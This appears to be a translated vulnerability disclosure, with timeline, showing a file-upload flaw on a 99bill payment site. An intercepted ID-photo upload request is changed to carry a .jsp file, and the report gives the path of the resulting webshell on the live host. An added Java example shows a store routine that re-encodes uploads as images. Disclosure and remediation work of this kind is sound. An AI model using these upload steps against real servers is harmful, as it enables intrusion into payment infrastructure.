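2016-05-16: Details reported to the vendor; awaiting vendor handling
2016-05-17: Vendor confirmed; details disclosed to the vendor only
2016-05-27: Details disclosed to core white hats and experts in related fields
2016-06-06: Details disclosed to regular white hats
2016-06-16: Details disclosed to intern white hats
2016-07-01: Details disclosed to the public
File upload getshell on a 99bill (快钱) site, leading into the internal network
Upload point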
https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&[email protected]
When uploading the ID photo, intercept the request and select a JSP shell directly in place of the image
POST /nspwebsite/common/nsp/applyBuy.do?method=uploadPic HTTP/1.1
Host: ipos.99bill.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&[email protected]
Cookie: JSESSIONID=D5DDB0B8E8F182523A54BFBE1DD0A61D.tomcatServer456-3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3238940103786
Content-Length: 7326

-----------------------------3238940103786
Content-Disposition: form-data; name="picF"; filename=".jsp
Successfully got a shell with a one-liner webshell
shell:
https://ipos.99bill.com/nspwebsite/common/nsp/file/20160516154400407_.jsp
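The stored name above (a timestamp, an underscore, then the client's `.jsp` filename) sits under a directory the application serves, which suggests the handler kept the client-supplied extension. The following is an added example, not code from this report or from the vendor: a Java store routine that never consults the client filename, accepts only bytes that decode as an image, re-encodes them, and writes them under a server-chosen name. The class name `PhotoUploadStore`, the size limit and the storage directory are assumptions.

```java
import java.awt.image.BufferedImage;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.util.UUID;
import javax.imageio.ImageIO;

// Added example (hypothetical class, not the vendor's code).
public final class PhotoUploadStore {
    private static final int MAX_BYTES = 5 * 1024 * 1024; // assumed upload size limit
    private final File storeDir; // assumed to lie outside any directory Tomcat serves or compiles

    public PhotoUploadStore(File storeDir) { this.storeDir = storeDir; }

    // Takes only the uploaded bytes: the client's filename and Content-Type are never consulted.
    public File store(byte[] upload) throws IOException {
        if (upload == null || upload.length == 0 || upload.length > MAX_BYTES) {
            throw new IOException("rejected: empty or oversized upload");
        }
        // ImageIO.read returns null when no registered reader recognises the bytes.
        BufferedImage img = ImageIO.read(new ByteArrayInputStream(upload));
        if (img == null) {
            throw new IOException("rejected: content is not a decodable image");
        }
        // Server-chosen name and fixed extension; re-encoding drops any trailing non-image data.
        File out = new File(storeDir, UUID.randomUUID() + ".png");
        if (!ImageIO.write(img, "png", out)) {
            throw new IOException("no PNG writer available");
        }
        return out;
    }

    public static void main(String[] args) throws IOException {
        File dir = new File(System.getProperty("java.io.tmpdir"), "photo-store-demo");
        if (!dir.isDirectory() && !dir.mkdirs()) throw new IOException("cannot create " + dir);
        PhotoUploadStore store = new PhotoUploadStore(dir);
        byte[] notImage = "<%-- constructed text standing in for a .jsp upload --%>".getBytes("UTF-8");
        try {
            store.store(notImage);
            throw new AssertionError("non-image upload was accepted");
        } catch (IOException expected) {
            System.out.println(expected.getMessage());
        }
        ByteArrayOutputStream png = new ByteArrayOutputStream(); // constructed 4x4 sample image
        ImageIO.write(new BufferedImage(4, 4, BufferedImage.TYPE_INT_RGB), "png", png);
        System.out.println("stored as " + store.store(png.toByteArray()).getName());
    }
}
```

Serving the stored photos through a handler that streams bytes with a fixed image Content-Type, rather than from a path the JSP servlet maps, keeps an accepted file from ever being compiled.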
Internal network
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-05-17 08:57
Thank you for your attention to 99bill. We will arrange a fix immediately!
None yet